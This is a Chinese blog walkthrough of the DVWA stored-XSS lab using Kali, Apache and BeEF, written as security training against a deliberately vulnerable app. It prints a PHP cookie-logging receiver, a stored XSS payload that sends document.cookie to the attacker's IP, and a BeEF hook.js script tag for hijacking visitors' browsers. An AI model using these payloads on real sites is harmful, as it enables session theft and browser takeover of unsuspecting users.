DVWA闯关XSS(Stored)番外篇

最新推荐文章于 2022-12-28 19:01:03 发布
最新推荐文章于 2022-12-28 19:01:03 发布
阅读量553 收藏
点赞数
分类专栏: DVWA 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44288604/article/details/108286597
版权

为了让实验效果更好一点,这里除了使用靶机(win2008的DVWA)之外,还要使用kali来做进攻者,来收集战果(cookie)

准备工作(手工搭建环境)

1:首先在你的kali上安装web服务
(如果你的web服务无法正常启用,也可以试试升级它)

sudo apt install apache2

2:启动web服务

systemctl start apache2.service

3:确认apache2是运行状态

systemctl status apache2.service

在这里插入图片描述
在这里插入图片描述
4:准备一个文件来接收cookie

sudo vim /var/www/html/cookie_rec.php

内容如下:

<?php
    $cookie=$_GET['cookie'];
    $log=fopen("cookie.txt","a");
    fwrite($log, $cookie . "\n");
    fclose($log);
?>

5:给目录权限,一会让它生成存放cookie的文件

sudo chown -R www-data.www-data /var/www/

6:渗透

<script>window.open('http://192.168.40.129/cookie_rec.php?cookie='+document.cookie)</script>
注:192.168.40.129是kali的ip
如果前面做了存储型XSS,请删干净,或者直接重置DVWA

7:解除长度限制,默认限制长度为50个字符
在这里插入图片描述
你可以现在kali上测试一下,正常情况下浏览器会出一个空白的新页面,这个时候你会发现/var/www/html目录下多了个cookie.txt,里面会记录你的cookie。确认这一点之后记得恢复环境!!!
(由于我测试了多次,所以cookie记录里面有三条记录)
在这里插入图片描述
在这里插入图片描述

渗透

1:在DVWA上植入XSS代码的时候,排个雷,实验没有效果的话,换个浏览器试试,这个跟浏览器的安全策略有关

我kali的火狐浏览器会出现一个弹窗并被拦截,放过那个弹窗即可 √
我物理机的火狐浏览器输入XSS代码时,无任何反应 ×
我物理机的Edge浏览器输入XSS代码时,直接弹到一个新的标签页 √

在这里插入图片描述
2:检查是否收到cookie
在这里插入图片描述

准备工作BeEF

记得重置DVWA的环境

启动apache和BeEF

systemctl start apache2.service
点一下BeEF图标启动BeEF

访问BeEF的web页面

http://192.168.40.129:3000/ui/panel

使用XSS

去靶机上填入BeEF自动生成的一个XSS代码

<script src="http://192.168.40.129:3000/hook.js"></script>

植入木马

考虑到前面使用火狐浏览器不大顺利,这次使用Edge
在这里插入图片描述

收到结果

在这里插入图片描述

扩大战果

因为这是存储型XSS,所以任何人访问DVWA的这个页面都会中招,那么这里就用kali去访问一下页面,只需要kali访问这个页面即可。
在这里插入图片描述
BeEF拿到战果,甚至显示出了kali的虚拟机标识,够智能

192.168.40.131表示它是万恶之源,我们拿到的战果都是因为它(131是DVWA的主机IP)
Edge是谷歌的开源 Chromium 内核重构浏览器
192.168.40.1是VM8网卡的IP

在这里插入图片描述

lainwith
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWAXSS
墨鱼菜鸡
08-05 104
XSS XSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据恶意代码是否存储在...
kali启动beef-xss失败
weixin_47370431的博客
11-22 1851
sudo apt-get update和sudo apt-get upgrade两个命令。并且apt install时会发生无法定位软件包的问题;(我这里选择的是阿里云的)
安装BeEF后起首次启动失败的解决记录
weixin_41908922的博客
01-20 2367
安装BeEF后启动失败问题安装BeEF后起首次启动失败。解决方法1、# apt --fix-broken install2、启动Apache服务3、启动BeEF 问题 安装BeEF后起首次启动失败。 解决方法 在shell中 进行如下操作 1、# apt --fix-broken install 原本计划的是卸载了重新安装,存在依赖问题删不了,系统提示了这条命令 2、启动Apache服务 # service apache2 start 3、启动BeEF # bee
kali自带浏览器上不了网的解决办法
热门推荐
weixin_44462536的博客
05-15 1万+
前言: 有人人会发现,我们之前还用起来好好的kali今天突然打开,浏览器打不开,网页也上不了如图: 原因: 因为kali网卡没有分配IP 解决办法: root@kali:~# ifconfig eth0 up //启用网卡 root@kali:~# ifconfig -a //查看IP root@kali:~# dhclient eth0 // 分配IP 注意: eth0就是你网卡的名字,请注意替换成你自己的。 ...
Kali安装beef-xss启动失败
wyzhxhn的博客
11-19 764
beef-xss
DVWA下的XSS
07-25
DVWA下的XSS
xss-dvwa靶场详情
最新发布
04-06
dvwa靶场中的xss漏洞详情
dvwa靶场,里面也有xss靶场
09-24
DVWA中的XSS靶场通常包含反射型XSS、存储型XSS和DOM型XSS三个部分,每个部分都有不同级别的难度,让用户逐步理解XSS的原理和防御方法。 2. **数据库连接配置** 在DVWA中,数据库连接信息位于`DVWA-master\config`...
DVWA靶场搭建与使用
09-02
**DVWA靶场搭建与使用** DVWA(Damn Vulnerable Web Application)是一个开源的Web应用程序,专门为网络安全专业人员、开发人员和学生设计,用于学习和练习常见Web应用漏洞的识别和利用。它提供了多种安全漏洞的...
DVWA 共12关通关笔记
09-12
DVWA 共12关通关笔记】 DVWA(Damn Vulnerable Web Application)是一个用于网络安全教育的开源Web应用程序。它包含各种安全漏洞,为初学者和专业人士提供了实践和学习Web安全漏洞的机会。DVWA分为多个级别,从低...
DVWA xss
qq_44159634的博客
12-12 622
DVWA中的XSS 参考文章: http://blog.nsfocus.net/xss-advance/ XSS分类: 反射型xss与存储型xss的区别主要在于,存储型xss是要存储在数据库中,然后从数据库中调用的 反射型xss low 直接输入<script>alert(1)</script>后,直接弹窗,查看源代码,发现直接注入进去了 medium 和low一样输入,发现不弹窗,回显 查看源码,发现 ...
kali 火狐访问不了网页
m0_64815693的博客
12-28 5420
kali 火狐bug问题
【网络安全】beef-xss实操以及xss修复方案
你在看屏幕的同时,屏幕也在注视着你
09-07 2203
beef-xss实操
BeEF-XSS详细使用教程
一个懒鬼的博客
05-10 6474
BeEF-XSS简介 BeEF-XSS是一款非常强大的web框架攻击平台,集成了许多payload,可以实现许多功能! 启动BeFF-XSS 关于kali没有安装beef可以参考下图: BeEF-XSS管理登录页面 用户名默认为beef,密码在首次启动beef-xss时需要手动设置。(启动beef-xss会自动打开浏览器) BeEF-XSS主页面介绍 Hocked Browers online browers 在线浏览器 offline browers 离线浏览..
【渗透测试工具beef】XSS渗透测试工具beef如何安装使用?
Bejpse的博客
03-02 502
目录 事情是这样的 beef介绍 beef工作原理简介 kali下使用beef beef配置IP地址及默认密码 使用beef攻击流程 启动beef 通过web端访问 1、输入config.xml中配置的用户名和密码,登录beef管理台 2、在网站中植入hook.js代码 3、客户端192.168.107.110,访问这个页面,就会被beef勾住,浏览器的大量信息就被beef获取到了 4、获取浏览器cookie 5、网页重定向,目标浏览器跳转到你指定的网页 6、登录弹窗,获取用户名和密码 模块颜色及解释 回顾
利用Beef劫持客户端浏览器
weixin_45329009的博客
10-28 1255
利用Beef劫持客户端浏览器 一、环境: 1.Kali(使用beef生成恶意代码,IP:192.168.0.103) 2.一台web服务器(留言板存在XSS跨站脚本漏洞,IP:192.168.0.104) 3. 客户端(用于访问web服务器,IP:192.168.0.101) 二、步骤: Kali使用beef生成恶意代码 将恶意代码写入192.168.0.104网站留言板 只要客户端访问这个服务...
Kali2020安装beef-xss框架,启动失败
虾壳的博客
05-22 5292
Kali2020安装beef-xss框架,启动失败 Kali2020安装beef-xss框架,启动失败,报错59 尝试了网上的各种方法后,总结了解决方法:卸载beef、ruby,重新安装 #apt remove ruby #apt remove beef-xss #apt-get install ruby #apt-get install ruby-dev libpcap-dev #gem install eventmachine #apt-get install beef-xss 问题解决,重新启动BE
beef-xss各位报错解决方案
weixin_46976845的博客
03-06 1627
beef-xss各种报错原因:系统更新或者依赖包更新。原配置文件无法加载。 解决办法: apt-get remove beef-xss //卸载beef-xss apt-get purge beef-xss //删除beef-xss配置 rm -r /usr/share/beef-xss/ //重点,彻底删除beef-xss所有的用户配置,0保留 apt-get install beef-xss //重新输入密码后,就可以正常使用了 ...
Kali beef-xss实现Xss详细教程。
sunwanfulove的博客
09-28 3417
Kali beef-xss实现Xss详细教程。
dvwa靶场测试xss攻击
09-20
DVWA靶场进行XSS攻击测试时,可以使用存储型XSS漏洞利用的方法。首先,测试靶场的接口是否过滤了`<script>`标签,可以构造payload来判断是否存在渗透点。如果接口没有过滤`<script>`标签,可以构造恶意代码来获取用户的cookie等信息。 存储型XSS攻击与反射型XSS攻击的区别在于,存储型XSS攻击能够将恶意代码长期嵌入到页面中,所有访问此页面的用户都会成为受害者,而反射型XSS攻击则是通过构造特定的URL,将恶意代码注入到URL参数中,当用户点击包含恶意代码的URL时才会触发攻击。 XSS(跨站脚本攻击)是一种利用网页漏洞,将恶意脚本注入到网页中,从而获取用户信息、劫持会话、传播恶意链接等的攻击方式。 DVWA靶场是一个用于演示和测试各种Web应用安全漏洞的虚拟环境,其中包含了多种XSS漏洞供用户测试和学习。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值